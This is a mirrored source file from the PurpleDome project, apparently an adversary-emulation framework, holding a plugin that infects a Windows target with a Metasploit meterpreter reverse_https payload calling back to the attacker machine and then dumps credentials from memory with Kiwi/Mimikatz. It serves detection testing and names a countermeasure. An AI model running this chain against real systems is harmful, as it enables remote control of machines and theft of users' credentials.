mirror of https://github.com/avast/PurpleDome
You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
54 lines
2.0 KiB
Python
54 lines
2.0 KiB
Python
#!/usr/bin/env python3
|
|
|
|
# A plugin to nmap targets slow motion, to evade sensors
|
|
|
|
from plugins.base.attack import AttackPlugin, Requirement
|
|
import socket
|
|
|
|
|
|
class MetasploitKiwiPlugin(AttackPlugin):
|
|
|
|
# Boilerplate
|
|
name = "metasploit_kiwi"
|
|
description = "Extract credentials from memory. Kiwi is the more modern Mimikatz"
|
|
ttp = "T1003"
|
|
references = ["https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz"]
|
|
|
|
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
|
|
|
|
requirements = [Requirement.METASPLOIT]
|
|
|
|
def __init__(self):
|
|
super().__init__()
|
|
self.plugin_path = __file__
|
|
|
|
def run(self, targets):
|
|
""" Run the command
|
|
|
|
@param targets: A list of targets, ip addresses will do
|
|
"""
|
|
|
|
self.attack_logger.start_narration("Extracting user credentials from memory.")
|
|
res = ""
|
|
payload_type = "windows/x64/meterpreter/reverse_https"
|
|
payload_name = "babymetal.exe"
|
|
target = self.targets[0]
|
|
|
|
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
|
|
|
|
self.metasploit.smart_infect(target,
|
|
payload=payload_type,
|
|
architecture="x64",
|
|
platform="windows",
|
|
lhost=ip,
|
|
format="exe",
|
|
outfile=payload_name)
|
|
|
|
self.metasploit.kiwi(target,
|
|
variant=self.conf['variant'],
|
|
situation_description="Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory.",
|
|
countermeasure="Memory access into critical processes should be monitored."
|
|
)
|
|
|
|
return res
|